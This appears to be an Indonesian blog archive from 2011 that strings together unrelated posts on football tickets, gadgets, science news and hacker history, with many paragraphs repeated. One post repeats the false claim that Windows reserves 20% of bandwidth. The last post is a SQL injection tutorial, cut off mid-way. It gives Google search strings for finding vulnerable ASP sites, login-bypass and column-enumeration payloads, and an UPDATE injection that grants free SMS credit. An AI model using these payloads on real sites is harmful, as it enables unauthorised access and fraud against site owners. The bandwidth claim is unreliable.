AFF menyebabkan masyarakat Indonesia demam sepak bola, euphoria AFF sangatlah mempengaruhi warga Indonesia untuk menyaksikan kesebelasan Favoritnya bertanding. Dari masyarakat menengah ke atas dan menengah ke bawah ingin ikut serta dalam mendukung Timnas Indonesia. Mereka tak ragu untuk merogoh kantong dalam-dalam, karena untuk sebuah tiket VVIP di Stadion Glora Bung Karno di bandrol sebesar 1-1.5jt selain harganya selangit untuk sebuah tiket sepak bola tiket-tiket tersebut juga biasanya sudah di booking oleh pihak-pihak lain seperti anggota dewan dan lain-lain. Kekacauan juga sering terjadi dalam pengantrian tiket di loket-loket penjualan. Banyak masyarakat yang berniat menonton pertandingan Tim Favoritnya, tapi mereka pulang dengan tangan kosong karena sudah kehabisan tiket. Kita bandingkan saja dengan Malaysia, mereka hanya membagi 2 jenis tiket yaitu tribun dan VIP dan hanya di bandrol sekitar 80.000,- untuk 1 tiket tribun dan 160.000,- untuk tiket VIP. Walaupun euphoria mereka juga besar untuk menonton, tapi loket-loket penjualan tiket tidak lah ricuh dalam mengantri. Sedangkan di Indonesia, untuk putaran final kita membandrol dari 150.000,- sampai 1.500.000,- lagi pula warga mengeluhkan bahwa fasilitas stadion tidak sebanding dengan apa yang mereka bayangkan dengan harga tiket yang mahal itu. Terlebih juga pembelian tiket via online, padahal baru di buka website tersebut tapi kebanyakan tiket sudah “sold out”. Apa yang salah dengan Indonesia? Apakah panitia pelaksananya ataupun masyarakat itu sendiri? Tapi kenapa tiketnya mahal sekali? Ketua PSSI menjawab bahwa tiket mahal karena pendapatan PSSI tidak bisa menutupi pengeluarannya sehingga PSSI membandrol harga tiket itu selangit. Tapi apakah tidak ada bantuan dari pemerintah ataupun sponsor?? Mungkin dengan tidak termanage dengan benar AFF menjadi kurang greget. Apa mungkin muncul gayus-gayus kecil di kubu PSSI?? Wallahualam…
Selasa, 11 Januari 2011
Sabtu, 01 Januari 2011
Alat Ini Mampu Mengubah Sampah Plastik Menjadi Minyak Mentah
Sampah plastik memang masih menjadi masalah besar bagi setiap negara karena yang satu ini tidak mudah diurai tetapi di satu sisi memang agak sulit untuk mengurangi penggunaan bahan plastik seperti untuk kantong plastik.
Blest, perusahaan dari Jepang telah menemukan sebuah alat yang bisa mengubah sampah plastik menjadi minyak mentah dan siapapun bisa melakukannya.
Alat ini juga sangat kecil sehingga bisa diletakkan di atas meja dan hanya butuh waktu beberapa saat untuk mengubah sampah plastik menjadi minak mentah.
Proses mengubah sampah plastik menjadi minyak mentah ini dilakukan dengan cara pemanasan yang akan melelehkan plastik dan mengubahnya menjadi gas kemudian dari gas yang ada akan mengubah air menjadi minyak.
Untuk 1 kg sampah plastik bisa menghasilkan 1 liter minyak mentah dan dari minyak mentah tersebut, dengan melakukan proses lanjutan akan bisa mengubahnya menjadi bensin dan lainnya, sama seperti minyak mentah biasa.
Blest akan menjual alat ini dengan harga US$ 9.500 (sekitar hampir 100 juta rupiah) dan kami rasa tidak mahal untuk sebuah alat yang sangat bisa membantu untuk mengurangi sampah plasti apalagi hasilnya bisa dijual kembali.
Sumber :
www.otakku.com
Blest, perusahaan dari Jepang telah menemukan sebuah alat yang bisa mengubah sampah plastik menjadi minyak mentah dan siapapun bisa melakukannya.
Alat ini juga sangat kecil sehingga bisa diletakkan di atas meja dan hanya butuh waktu beberapa saat untuk mengubah sampah plastik menjadi minak mentah.
Proses mengubah sampah plastik menjadi minyak mentah ini dilakukan dengan cara pemanasan yang akan melelehkan plastik dan mengubahnya menjadi gas kemudian dari gas yang ada akan mengubah air menjadi minyak.
Untuk 1 kg sampah plastik bisa menghasilkan 1 liter minyak mentah dan dari minyak mentah tersebut, dengan melakukan proses lanjutan akan bisa mengubahnya menjadi bensin dan lainnya, sama seperti minyak mentah biasa.
Blest akan menjual alat ini dengan harga US$ 9.500 (sekitar hampir 100 juta rupiah) dan kami rasa tidak mahal untuk sebuah alat yang sangat bisa membantu untuk mengurangi sampah plasti apalagi hasilnya bisa dijual kembali.
Sumber :
www.otakku.com
Baju Instan, Tinggal Rebus Saja
Jepang memang terkenal sebagai gudang nya teknologi. Tidak lama ini, Jepang menciptakan kaos instan dengan teknologi mie instan (lho, kok kayak mi instan?). Kaos instan ini prinsipnya memang sama seperti mi instan lho.
Kaos ini aslinya berukuran sangat mini, tetapi begitu direndam di air, ukuran nya akan menjadi normal. Cocok sekali untuk dibawa berpergian, jadi tidak perlu lagi bawa-bawa tas besar.
Kaos ini aslinya berukuran sangat mini, tetapi begitu direndam di air, ukuran nya akan menjadi normal. Cocok sekali untuk dibawa berpergian, jadi tidak perlu lagi bawa-bawa tas besar.
Sumber :
www.melonproperty.com
Telinga, Identifikasi Baru Setelah Sidik Jari
Lupakan metode identifikasi melalui sidik jari atau warna mata, kini para peneliti telah menemukan cara baru untuk mengidentifikasi seseorang, yaitu melalui telinga.
Profesor Mark Nixon dari Sekolah Elektronik dan Ilmu Komputer di University of Southampton, mengatakan setiap orang memiliki bentuk telinga yang unik dan berbeda-beda. "Cukup memindai telinga dengan biometrik, maka akan ketahuan siapa pemilik telinga ini," katanya.
Menurut Nixon, telinga memiliki keunggulan ketimbang bagian tubuh lain karena telinga dapat tumbuh secara proporsional sehingga bisa dipastikan 99 persen keakuratannya.
Mengidentifikasi seseorang melalui pengenalan wajah misalnya, kata dia, bisa saja keliru karena terjadi perubahan ekspresi dan penggunaan make up atau kosmetik yang berlebihan.
Penelusuran melalui retina atau warna mata juga, menurut Nixon, terlalu "ribet" karena harus melihat dan mendekatkan subjek dengan scanner dari jarak dekat. Adapun metode identifikasi melalui sidik jari, menurut dia, kemungkinan besar keliru karena rumitnya guratan memutar yang terdapat pada jari.
Profesor Nixon telah menguji 252 gambar telinga yang berbeda-beda kemudian menciptakan sistem yang mampu mencocokkan setiap gambar telinga dengan database yang ada.
Sumber :
www.tempointeraktif.com
Profesor Mark Nixon dari Sekolah Elektronik dan Ilmu Komputer di University of Southampton, mengatakan setiap orang memiliki bentuk telinga yang unik dan berbeda-beda. "Cukup memindai telinga dengan biometrik, maka akan ketahuan siapa pemilik telinga ini," katanya.
Menurut Nixon, telinga memiliki keunggulan ketimbang bagian tubuh lain karena telinga dapat tumbuh secara proporsional sehingga bisa dipastikan 99 persen keakuratannya.
Mengidentifikasi seseorang melalui pengenalan wajah misalnya, kata dia, bisa saja keliru karena terjadi perubahan ekspresi dan penggunaan make up atau kosmetik yang berlebihan.
Penelusuran melalui retina atau warna mata juga, menurut Nixon, terlalu "ribet" karena harus melihat dan mendekatkan subjek dengan scanner dari jarak dekat. Adapun metode identifikasi melalui sidik jari, menurut dia, kemungkinan besar keliru karena rumitnya guratan memutar yang terdapat pada jari.
Profesor Nixon telah menguji 252 gambar telinga yang berbeda-beda kemudian menciptakan sistem yang mampu mencocokkan setiap gambar telinga dengan database yang ada.
Sumber :
www.tempointeraktif.com
Pionen, Tempat Penyimpanan Data Tercanggih Di Dunia
Data center bawah tanah ini memiliki rumah kaca, air terjun, mesin kapal selam Jerman, sinar matahari artifisial dan dapat bertahan dari serangan bom hidrogen mirip seperti tempat persembuyian musuh James Bond.
Sumber :
www.kaskus.us
Data center ini benar-benar ada, dibuat oleh salah satu ISP terbesar Swedia yang terletak dalam bunker nuklir yang dibangun di bawah Stockholm, terpisahkan dari dunia luar oleh pintu setebal 40 cm.
Beberapa fakta menarik tentang data center ini :
1. Pada awalnya merupakan sebuah bunker nuklir yang digunakan dalam masa perang dingin. Saat itu bunker ini diberi kode nama Pionen White Mountains.
2. Terletak 30 meter di bawah lapisan granit yang berada tepat di bawah Stockholm, Pionen memiliki luas 1.110 meter persegi.
3. Pionen dirombak total menjadi data center mutakhir di tahun 2007-2008. Saat pembangungn mereka harus meledakkan batu sebanyak lebih dari 4.000 meter kubik untuk membuat ruang.
4. Pionen dirancang untuk dapat bertahan dari serangan bom hidrogen.
atap granit.
5. Pionen berisikan NOC yang mengontrol lima dari data center yang dimiliki Bahnhof, salah satu ISP terbesar di Swedia. Fasilitas tersebut juga berfungsi sebagai tempat hosting colocation jadi apabila ingin, Anda dapat menempatkan server Anda di situ (saya yakin harganya tidak murah).
6. Listrik cadangan dihasilkan oleh dua mesin diesel Maybach yang biasanya dipakai di kapal selam Jerman, mampu memproduksi daya sebesar 1,5 Megawatt.
7. Akses internet dengan redudansi tiga lapis, jaringan itu terbuat dari serat optik melalui tiga jalur yang berbeda di bawah gunung. Pionen merupakan salah satu tempat dengan koneksi internet terbaik di Eropa Utara.
8. Lingkungan kerja Pionen dilengkapi dengan rumah kaca, air terjun, akuarium air asin sebesar 2.600 liter dan sinar matahari buatan untuk menjaga kenyamanan karyawan.
9. 15 karyawan senior bekerja full time di Pionen
www.kaskus.us
Tornado Buatan Terbesar Di Dunia
Museum Mercedes-Benz di Stuttgart, Jerman dapat menghasilkan tornado buatan terbesar di dunia. Museum ini telah diakui oleh Guinness Book of Records untuk menciptakan "Tornado buatan terkuat dan terbesar di dunia".
Ini merupakan teknologi canggih, tapi mungkin kalian bertanya, apakah kegunaan tornado buatan terbesar di dunia ini di dalam ruangan museum Mercedes-Benz?
Tornado buatan ini setinggi 34,4 meter (113 kaki) berfungsi untuk menghilangkan asap dari museum pada saat terjadi kebakaran, selain itu juga diperuntukkan sebagai daya tarik museum.
Museum Mercedes-Benz sekali lagi menegaskan posisi outstanding nya di dunia museum dalam hal arsitektur. Pengerjaan teknologi tornado ini khusus ditempatkan pada perencana konstruksi, arsitek dan insinyur yang mengerjakannya adalah khusus yang berkaitan dengan teknologi eliminasi asap.
Tornado ini membutuhkan waktu sekitar 7 menit untuk membentuk pusarannya yang dihasilkan oleh 144 mesin jet dan 28 ton udara.
Pada gambar, karbon dioksida sedang disemprotkan ke bagian bawah tornado untuk membuatnya terbentuk. Daerah tekanan rendah di pusat tornado berfungsi untuk membuat aliran jet yang menarik asap keluar dari koridor gedung lalu menyalurkannya ke atas dan keluar melalui cerobong di atas atap.
Sumber :
www.kaskus.us
Tornado buatan ini setinggi 34,4 meter (113 kaki) berfungsi untuk menghilangkan asap dari museum pada saat terjadi kebakaran, selain itu juga diperuntukkan sebagai daya tarik museum.
Museum Mercedes-Benz sekali lagi menegaskan posisi outstanding nya di dunia museum dalam hal arsitektur. Pengerjaan teknologi tornado ini khusus ditempatkan pada perencana konstruksi, arsitek dan insinyur yang mengerjakannya adalah khusus yang berkaitan dengan teknologi eliminasi asap.
Pada gambar, karbon dioksida sedang disemprotkan ke bagian bawah tornado untuk membuatnya terbentuk. Daerah tekanan rendah di pusat tornado berfungsi untuk membuat aliran jet yang menarik asap keluar dari koridor gedung lalu menyalurkannya ke atas dan keluar melalui cerobong di atas atap.
www.kaskus.us
Darah Buatan Dari Tali Pusar
Saat kondisi tertentu terkadang seseorang membutuhkan darah dalam waktu cepat, seperti misalnya dalam kondisi perang. Kini peneliti telah mengembangkan darah buatan yang bisa digunakan pada kondisi darurat.
Ilmuwan Amerika Serikat telah mengembangkan 'darah buatan' yang bisa digunakan tentara ketika terluka dalam peperangan. Rekayasa genetik darah ini dibuat dengan mengambil sel dari tali pusar, lalu menggunakan mesin yang bisa meniru cara kerja dari sumsum tulang untuk menghasilkan sejumlah sel darah merah.
Seperti dikutip dari Dailymail, darah dibuat dengan menggunakan sel-sel hematopoietic yang diambil dari tali pusar dalam proses yang disebut dengan 'pharming'. Satu tali pusat dapat menghasilkan 20 unit darah yang bisa digunakan.
Sel darah yang diproduksi dengan menggunakan metode ini secara fungsional tidak berbeda dengan sel-sel darah merah dalam sirkulasi yang sehat atau darah aslinya. Karena teknik ini pada dasarnya meniru cara kerja dari sumsum tulang belakang, tapi prosesnya dilakukan di laboratorium.
Jika hal ini disetujui, maka bisa menjadi revolusi dalam kondisi perang. Karena pada kondisi ini cenderung sulit mendapatkan donor darah untuk membantu merawat tentara yang terluka.
Selain itu proses transfusi darah pada daerah atau kondisi perang jauh lebih sulit dibandingkan donor darah biasanya.
Proyek penelitian ini sudah dilakukan sejak tahun 2008, kemungkinan darah buatan ini sudah bisa digunakan untuk militer dalam waktu lima tahun ke depan. Sebuah unit darah berisi sekitar seperdelapan hingga sepersepuluh dari darah total di tubuh manusia.
Saat ini peneliti sudah membuat darah 'pharmed' untuk golongan O negatif yang merupakan golongan darah paling banyak dicari. Hal ini karena golongan darah tersebut dapat digunakan untuk semua jenis pasien.
Darah adalah cairan yang terdapat di dalam semua makhluk hidup kecuali tumbuhan, fungsi utamanya adalah mengirimkan zat-zat serta oksigen yang dibutuhkan oleh jaringan tubuh.
Selain itu darah juga berfungsi mengangkut bahan kimia hasil metabolisme serta sebagai pertahanan tubuh terhadap virus atau bakteri.
Sumber :
detikhealth.com
Ilmuwan Amerika Serikat telah mengembangkan 'darah buatan' yang bisa digunakan tentara ketika terluka dalam peperangan. Rekayasa genetik darah ini dibuat dengan mengambil sel dari tali pusar, lalu menggunakan mesin yang bisa meniru cara kerja dari sumsum tulang untuk menghasilkan sejumlah sel darah merah.
Seperti dikutip dari Dailymail, darah dibuat dengan menggunakan sel-sel hematopoietic yang diambil dari tali pusar dalam proses yang disebut dengan 'pharming'. Satu tali pusat dapat menghasilkan 20 unit darah yang bisa digunakan.
Sel darah yang diproduksi dengan menggunakan metode ini secara fungsional tidak berbeda dengan sel-sel darah merah dalam sirkulasi yang sehat atau darah aslinya. Karena teknik ini pada dasarnya meniru cara kerja dari sumsum tulang belakang, tapi prosesnya dilakukan di laboratorium.
Jika hal ini disetujui, maka bisa menjadi revolusi dalam kondisi perang. Karena pada kondisi ini cenderung sulit mendapatkan donor darah untuk membantu merawat tentara yang terluka.
Selain itu proses transfusi darah pada daerah atau kondisi perang jauh lebih sulit dibandingkan donor darah biasanya.
Proyek penelitian ini sudah dilakukan sejak tahun 2008, kemungkinan darah buatan ini sudah bisa digunakan untuk militer dalam waktu lima tahun ke depan. Sebuah unit darah berisi sekitar seperdelapan hingga sepersepuluh dari darah total di tubuh manusia.
Saat ini peneliti sudah membuat darah 'pharmed' untuk golongan O negatif yang merupakan golongan darah paling banyak dicari. Hal ini karena golongan darah tersebut dapat digunakan untuk semua jenis pasien.
Darah adalah cairan yang terdapat di dalam semua makhluk hidup kecuali tumbuhan, fungsi utamanya adalah mengirimkan zat-zat serta oksigen yang dibutuhkan oleh jaringan tubuh.
Selain itu darah juga berfungsi mengangkut bahan kimia hasil metabolisme serta sebagai pertahanan tubuh terhadap virus atau bakteri.
Sumber :
detikhealth.com
Malam Tahun Baru Akan Diguyur Hujan Meteor Quadrantids
Jika tak mendung apalagi hujan, langit malam tahun baru 2011 bakal menjadi layar pertunjukan bagi empat hujan meteor sekaligus. Hujan meteor Quadrantids akan berlangsung mulai 1 hingga 5 Januari mendatang. Tiga hujan meteor lainnya beraksi hingga 20 Januari.
Ilustrasi
Astronom dari Observatorium Bosscha, Lembang, Jawa Barat, Evan Irawan Akbar mengatakan, hujan meteor Quadrantids akan terlihat di langit sebelah timur laut. Dari garis horison, ketinggiannya sekitar 30 derajat. “Seluruh dunia termasuk Indonesia bisa menyaksikannya,” kata Evan.
Waktu terbaik menyaksikan hujan meteor Quadrantids antara pukul 01.00 hingga subuh. Pada 1-3, dan 5 Januari, diperkirakan bakal melesat 15 meteor per jam. Sedangkan pada malam puncak 4 Januari, ada 40-an meteor yang terlihat setiap jamnya. “Tapi masa puncak itu singkat, hanya 3 jam dari pukul satu dinihari,” ujarnya.
Hujan meteor Quadrantids kali ini memang tidak sederas hujan meteor lainnya. Alasannya, kata Evan, lintasan bumi berada agak jauh dari gumpalan asteroid atau komet yang menyebarkan partikelnya itu dan terlihat sebagai hujan meteor di bumi. “Ibarat mobil, bumi tidak melintas di tengah tapi di pinggir jalan,” katanya.
Bersamaan dengan hujan meteor Quadrantids, tiga hujan meteor lainnya turun secara acak. Titik arah datang tiga hujan meteor yang belum diketahui namanya itu, ujar dia, bisa datang dari mana saja. Frekuensinya relatif kecil, sekitar 10 meteor per jam.
Pengalamannya tahun lalu, seluruh keindahan hujan cahaya langit di awal tahun itu bisa disaksikan dari kampus Institut Teknologi Bandung dengan mata telanjang. Observatorium Bosscha sendiri tidak akan memantau dan merekamnya karena masalah teknis. “Selain terhalang pepohononan, teropong Bosscha dirancang untuk mengamati langit selatan,” katanya.
Sumber :
tempointeraktif.com
Ilustrasi
Astronom dari Observatorium Bosscha, Lembang, Jawa Barat, Evan Irawan Akbar mengatakan, hujan meteor Quadrantids akan terlihat di langit sebelah timur laut. Dari garis horison, ketinggiannya sekitar 30 derajat. “Seluruh dunia termasuk Indonesia bisa menyaksikannya,” kata Evan.
Waktu terbaik menyaksikan hujan meteor Quadrantids antara pukul 01.00 hingga subuh. Pada 1-3, dan 5 Januari, diperkirakan bakal melesat 15 meteor per jam. Sedangkan pada malam puncak 4 Januari, ada 40-an meteor yang terlihat setiap jamnya. “Tapi masa puncak itu singkat, hanya 3 jam dari pukul satu dinihari,” ujarnya.
Hujan meteor Quadrantids kali ini memang tidak sederas hujan meteor lainnya. Alasannya, kata Evan, lintasan bumi berada agak jauh dari gumpalan asteroid atau komet yang menyebarkan partikelnya itu dan terlihat sebagai hujan meteor di bumi. “Ibarat mobil, bumi tidak melintas di tengah tapi di pinggir jalan,” katanya.
Bersamaan dengan hujan meteor Quadrantids, tiga hujan meteor lainnya turun secara acak. Titik arah datang tiga hujan meteor yang belum diketahui namanya itu, ujar dia, bisa datang dari mana saja. Frekuensinya relatif kecil, sekitar 10 meteor per jam.
Pengalamannya tahun lalu, seluruh keindahan hujan cahaya langit di awal tahun itu bisa disaksikan dari kampus Institut Teknologi Bandung dengan mata telanjang. Observatorium Bosscha sendiri tidak akan memantau dan merekamnya karena masalah teknis. “Selain terhalang pepohononan, teropong Bosscha dirancang untuk mengamati langit selatan,” katanya.
Sumber :
tempointeraktif.com
Manipulasi Bandwidth di Windows
Pada dasarnya OS windows sudah membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal.
Jika anda ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat dan kencang bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut supaya pada Windows kita bisa maksimal dalam menggunakan bandwidth yang sudah ada.
Ikuti petunjuknya seperti dibawah ini :
1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. kemudian Klik Network
7. setelah terbuka klik QoS Packet scheduler
8. kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply,ok
12. Kemudian keluar dan Restart komputer.
Jika anda ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat dan kencang bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut supaya pada Windows kita bisa maksimal dalam menggunakan bandwidth yang sudah ada.
Ikuti petunjuknya seperti dibawah ini :
1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. kemudian Klik Network
7. setelah terbuka klik QoS Packet scheduler
8. kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply,ok
12. Kemudian keluar dan Restart komputer.
Hacker
hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya, terutama keamanan.
sejarah.
Terminologi Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.
Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai Hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi Hacker.
Para Hacker mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan Hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.
Hacker memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa Hackerlah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para Hacker dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.
sejarah.
Terminologi Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.
Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai Hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi Hacker.
Para Hacker mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan Hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.
Hacker memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa Hackerlah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para Hacker dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.
Belajar Hack Website :)
Cara Hack Website
Hallo Semua? Apakabar? Sorry Sudah Lama Offline? ini ada sedikit cerpen tentang cara hack sebuah Website ,tapi jangan di gunakan untuk kejahatan ya
::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE
::DESCRIPTION: :
===============
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.
::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.
::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :
1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp
semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP
ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...
nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :
userid : ' having 1=1--
Password :fuzk3
lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25
tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25
nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)
atau cara ke 2
::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail
.::BODY::.
============
Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)
Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :
